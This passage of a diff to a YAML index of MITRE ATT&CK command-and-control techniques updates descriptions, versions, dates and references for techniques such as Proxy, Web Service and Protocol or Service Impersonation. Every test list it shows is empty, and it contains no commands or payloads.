       description: "Adversaries may communicate using OSI application layer protocols
         to avoid detection/network filtering by blending in with existing traffic.
         Commands to the remote system, and often the results of those commands, will
         be embedded within the protocol traffic between the client and server. \n\nAdversaries
         may utilize many different protocols, including those used for web browsing,
-        transferring files, electronic mail, or DNS. For connections that occur internally
-        within an enclave (such as those between a proxy or pivot node and other nodes),
-        commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye
-        Spy Email Nov 22) "
+        transferring files, electronic mail, DNS, or publishing/subscribing. For connections
+        that occur internally within an enclave (such as those between a proxy or
+        pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation:
+        Mandiant APT29 Eye Spy Email Nov 22) "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -38025,7 +38503,7 @@ command-and-control:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -38050,7 +38528,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071
     atomic_tests: []
   T1219:
@@ -38134,7 +38611,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1219
     atomic_tests: []
   T1659:
@@ -38198,11 +38674,10 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -38286,7 +38761,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1572:
     technique:
@@ -38317,7 +38791,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T17:15:35.372Z'
       name: Protocol Tunneling
       description: "Adversaries may tunnel network communications to and from a victim
         system within a separate protocol to avoid detection/network filtering and/or
@@ -38337,8 +38811,8 @@ command-and-control:
         encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua
         JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572)
         in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or
-        [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to
-        further conceal C2 communications and infrastructure. "
+        [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003)
+        to further conceal C2 communications and infrastructure. "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -38360,8 +38834,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1572
     atomic_tests: []
   T1071.003:
@@ -38423,7 +38895,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1092:
     technique:
@@ -38471,7 +38942,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1090.002:
     technique:
@@ -38525,7 +38995,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1090:
     technique:
@@ -38558,7 +39027,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T19:16:11.648Z'
       name: Proxy
       description: |-
         Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
@@ -38578,8 +39047,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1568:
     technique:
@@ -38617,7 +39084,7 @@ command-and-control:
         url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
         description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
           2, Feature Engineering. Retrieved February 18, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:26:23.782Z'
       name: Dynamic Resolution
       description: |-
         Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
@@ -38645,42 +39112,22 @@ command-and-control:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1102:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Anastasios Pingios
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
-      type: attack-pattern
-      created: '2017-05-31T21:31:13.915Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1102
-        url: https://attack.mitre.org/techniques/T1102
-      - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
-        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
-          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
-        source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-07T17:53:54.380Z'
       name: Web Service
       description: |-
-        Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
+        Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: Broadcom BirdyClient Microsoft Graph API 2024) Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
 
         Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_contributors:
+      - Anastasios Pingios
+      - Sarathkumar Rajendran, Microsoft Defender365
+      x_mitre_deprecated: false
       x_mitre_detection: 'Host data that can relate unknown or suspicious process
         activity using a network connection is important to supplement any existing
         indicators of compromise based on malware command and control signatures and
@@ -38689,17 +39136,39 @@ command-and-control:
         for uncommon data flows (e.g., a client sending significantly more data than
         it receives from a server). User behavior monitoring may help to detect abnormal
         patterns of activity.(Citation: University of Birmingham C2)'
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_permissions_required:
-      - User
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
+      created: '2017-05-31T21:31:13.915Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1102
+        external_id: T1102
+      - source_name: Broadcom BirdyClient Microsoft Graph API 2024
+        description: Broadcom. (2024, May 2). BirdyClient malware leverages Microsoft
+          Graph API for C&C communication. Retrieved July 1, 2024.
+        url: https://www.broadcom.com/support/security-center/protection-bulletin/birdyclient-malware-leverages-microsoft-graph-api-for-c-c-communication
+      - source_name: University of Birmingham C2
+        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
+          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+        url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1568.003:
     technique:
@@ -38731,7 +39200,7 @@ command-and-control:
         description: Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage
           Operations. Retrieved March 6, 2017.
         url: https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T20:54:28.287Z'
       name: DNS Calculation
       description: |-
         Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)
@@ -38748,8 +39217,6 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1104:
     technique:
@@ -38769,7 +39236,7 @@ command-and-control:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1104
         external_id: T1104
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:43:38.181Z'
       name: Multi-Stage Channels
       description: |-
         Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
@@ -38792,8 +39259,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1205.001:
     technique:
@@ -38818,7 +39283,7 @@ command-and-control:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -38843,8 +39308,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.002:
     technique:
@@ -38909,7 +39372,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1102.003:
     technique:
@@ -38933,7 +39395,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:26:10.109Z'
       name: One-Way Communication
       description: |-
         Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.
@@ -38958,21 +39420,36 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1090.003:
     technique:
-      modified: '2024-04-19T13:24:36.872Z'
+      modified: '2024-09-25T20:48:24.411Z'
       name: 'Proxy: Multi-hop Proxy'
-      description: |-
-        Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
-
-        For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing)
-
-        In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN).  Protocols such as ICMP may be used as a transport.
-
-        Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)
+      description: "Adversaries may chain together multiple proxies to disguise the
+        source of malicious traffic. Typically, a defender will be able to identify
+        the last proxy traffic traversed before it enters their network; the defender
+        may or may not be able to identify any previous proxies before the last-hop
+        proxy. This technique makes identifying the original source of the malicious
+        traffic even more difficult by requiring the defender to trace malicious traffic
+        through several proxies to identify its source.\n\nFor example, adversaries
+        may construct or use onion routing networks – such as the publicly available
+        [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted
+        C2 traffic through a compromised population, allowing communication with any
+        device within the network.(Citation: Onion Routing) Adversaries may also use
+        operational relay box (ORB) networks composed of virtual private servers (VPS),
+        Internet of Things (IoT) devices, smart devices, and end-of-life routers to
+        obfuscate their operations. (Citation: ORB Mandiant) \n\nIn the case of network
+        infrastructure, it is possible for an adversary to leverage multiple compromised
+        devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)).
+        By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001)
+        on routers, adversaries can add custom code to the affected network devices
+        that will implement onion routing between those nodes. This method is dependent
+        upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599)
+        method allowing the adversaries to cross the protected network boundary of
+        the Internet perimeter and into the organization’s Wide-Area Network (WAN).
+        \ Protocols such as ICMP may be used as a transport.  \n\nSimilarly, adversaries
+        may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement
+        routing between a decentralized network of peers.(Citation: NGLite Trojan)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -38991,7 +39468,7 @@ command-and-control:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '2.1'
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -39005,6 +39482,11 @@ command-and-control:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1090/003
         external_id: T1090.003
+      - source_name: ORB Mandiant
+        description: Raggi, Michael. (2024, May 22). IOC Extinction? China-Nexus Cyber
+          Espionage Actors Use ORB Networks to Raise Cost on Defenders. Retrieved
+          July 8, 2024.
+        url: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks
       - source_name: NGLite Trojan
         description: Robert Falcone, Jeff White, and Peter Renals. (2021, November
           7). Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers
@@ -39018,12 +39500,11 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1090.003
     atomic_tests: []
   T1001:
     technique:
-      modified: '2024-02-02T19:04:35.389Z'
+      modified: '2024-10-07T15:07:47.232Z'
       name: Data Obfuscation
       description: 'Adversaries may obfuscate command and control traffic to make
         it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November
@@ -39073,11 +39554,10 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1571:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:37:57.868Z'
       name: Non-Standard Port
       description: |-
         Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
@@ -39086,20 +39566,20 @@ command-and-control:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_deprecated: false
       x_mitre_detection: 'Analyze packet contents to detect communications that do
         not follow the expected protocol behavior for the port that is being used.
         Analyze network data for uncommon data flows (e.g., a client sending significantly
         more data than it receives from a server). Processes utilizing the network
         that do not normally have network communication or have never been seen before
         are suspicious.(Citation: University of Birmingham C2)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
@@ -39124,17 +39604,16 @@ command-and-control:
         url: https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
       - source_name: change_rdp_port_conti
         description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
-          Retrieved March 1, 2022.'
-        url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+          Retrieved September 12, 2024.'
+        url: https://x.com/TheDFIRReport/status/1498657772254240768
       - source_name: Fortinet Agent Tesla April 2018
         description: Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware
           Variant. Retrieved November 5, 2018.
         url: https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1571
     atomic_tests: []
   T1573:
@@ -39190,7 +39669,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1573
     atomic_tests: []
   T1102.002:
@@ -39215,7 +39693,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:15:47.861Z'
       name: Bidirectional Communication
       description: "Adversaries may use an existing, legitimate external Web service
         as a means for sending commands to and receiving output from a compromised
@@ -39252,8 +39730,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1573.002:
     technique:
@@ -39307,7 +39783,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1095:
     technique:
@@ -39379,33 +39854,12 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1095
     atomic_tests: []
   T1001.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - Windows
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
-      type: attack-pattern
-      created: '2020-03-15T00:40:27.503Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1001.003
-        url: https://attack.mitre.org/techniques/T1001/003
-      - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
-        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
-          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
-        source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
-      name: Protocol Impersonation
+      modified: '2024-10-09T15:40:19.436Z'
+      name: Protocol or Service Impersonation
       description: "Adversaries may impersonate legitimate protocols or web service
         traffic to disguise command and control activity and thwart analysis efforts.
         By impersonating legitimate protocols or web services, adversaries can make
@@ -39413,23 +39867,61 @@ command-and-control:
         \ \n\nAdversaries may impersonate a fake SSL/TLS handshake to make it look
         like subsequent traffic is SSL/TLS encrypted, potentially interfering with
         some security tooling, or to make the traffic look like it is related with
-        a trusted entity. "
+        a trusted entity. \n\nAdversaries may also leverage legitimate protocols to
+        impersonate expected web traffic or trusted services. For example, adversaries
+        may manipulate HTTP headers, URI endpoints, SSL certificates, and transmitted
+        data to disguise C2 communications or mimic legitimate services such as Gmail,
+        Google Drive, and Yahoo Messenger.(Citation: ESET Okrum July 2019)(Citation:
+        Malleable-C2-U42)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_contributors:
+      - James Emery-Callcott, Emerging Threats Team, Proofpoint
+      x_mitre_deprecated: false
       x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
         sending significantly more data than it receives from a server). Processes
         utilizing the network that do not normally have network communication or have
         never been seen before are suspicious. Analyze packet contents to detect communications
         that do not follow the expected protocol behavior for the port that is being
         used.(Citation: University of Birmingham C2)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
+      created: '2020-03-15T00:40:27.503Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1001/003
+        external_id: T1001.003
+      - source_name: Malleable-C2-U42
+        description: 'Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu Yanhui Jia
+          Siddhart Shibiraj. (2022, March 16). Cobalt Strike Analysis and Tutorial:
+          How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect. Retrieved
+          September 24, 2024.'
+        url: https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/
+      - source_name: University of Birmingham C2
+        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
+          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+        url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+      - source_name: ESET Okrum July 2019
+        description: 'Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF
+          RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1090.004:
     technique:
@@ -39476,7 +39968,6 @@ command-and-control:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1132:
     technique:
@@ -39536,7 +40027,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1132.002:
     technique:
@@ -39568,7 +40058,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-14T23:39:50.117Z'
       name: Non-Standard Encoding
       description: 'Adversaries may encode data with a non-standard data encoding
         system to make the content of command and control traffic more difficult to
@@ -39594,8 +40084,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.001:
     technique:
@@ -39662,7 +40150,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071.001
     atomic_tests: []
   T1105:
@@ -39760,7 +40247,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1105
     atomic_tests: []
   T1665:
@@ -39853,7 +40339,6 @@ command-and-control:
